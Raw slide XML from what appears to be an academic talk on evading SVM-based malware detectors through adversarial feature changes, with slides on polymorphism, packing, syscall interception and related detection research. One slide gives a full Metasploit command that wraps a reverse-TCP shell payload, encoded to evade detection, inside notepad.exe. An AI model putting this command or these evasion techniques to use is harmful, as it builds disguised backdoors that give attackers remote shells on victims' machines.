              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>RR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Add: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>make n attributes present(:1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>in all test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>instances, making viruses look like benign samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>remove n attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>from all test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>instances, deleting viruses’ most distinguishable features</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="493286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Result: Adding Highest N Attributes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4285" y="1264555"/>
            <a:ext cx="7302603" cy="5465072"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4115229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Result: Deleting Lowest N Attributes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5796" y="1264555"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14890013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Result: Combined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264555"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9536917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Existing Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our strategy is close to a combination of two existing hiding schemes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Disguise as popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>formats/programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Polymorphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Single scheme above is not effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> against modern antivirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2201532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Disguise as Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ile Formats or Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Useful tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Community Edition penetration-testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ackage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>exploits or backdoors into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>files (.doc, .pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) or programs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> LHOST=192.168.1.75 LPORT=4444 R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -c 5 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> &gt; notepad2.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210946" y="4408173"/>
            <a:ext cx="1835465" cy="1835465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5470902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Polymorphic Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1347776"/>
            <a:ext cx="8915400" cy="2952755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>mutates on each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>copy by adding NOPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg1. Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>0 to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ORing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> a register with itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg3. shifting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>it left 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg4. jumping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>to the next instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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227" y="4027284"/>
            <a:ext cx="7344926" cy="2673553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17812370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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xisting Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Obfuscation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Executable compression, old yet effective. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ultimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Packer for executables (UPX): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>upx.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>interception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>antivirus scans boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, virus in memory just returns the true boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>rather than its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>hiding place in the bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>block.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13884411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Problem Description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563976" y="4293064"/>
            <a:ext cx="10628024" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How should a virus disguise itself to fool the detector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adversarial Machine Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What are the important features of malicious executables?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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705" y="1497637"/>
            <a:ext cx="6002824" cy="3241169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71988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&amp; Future Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741611" y="2286000"/>
            <a:ext cx="9127659"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smtClean="0"/>
              <a:t>By modifying Top N attributes, we can fool the existing SVM model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>On the anti-virus software side: How to be robust?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15380266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400" dirty="0" smtClean="0"/>
              <a:t>Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1450121"/>
            <a:ext cx="8915400" cy="5587173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>N-gram Feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a1b2c3d4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> 3-gram: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a1b2c3 &amp; b2c3d4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Binary/Assembly/DLL N-gram Feature Set</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Hybrid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>model:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Combine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Best 500 features for each set based on Gain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Algorithm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Masud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, Mohammad M., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Latifur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Khan, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Bhavani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Thuraisingham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>A hybrid model to detect malicious executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>." Communications, 2007. ICC'07. IEEE International Conference on. IEEE, 2007.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639672" y="4035585"/>
            <a:ext cx="6097868" cy="871124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13714993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dissolv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400" dirty="0" smtClean="0"/>
              <a:t>Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1607128"/>
            <a:ext cx="8915400" cy="5444836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Features: DLLs/GNU Strings/Byte Sequence(hex)</a:t>
            </a:r>
          </a:p>
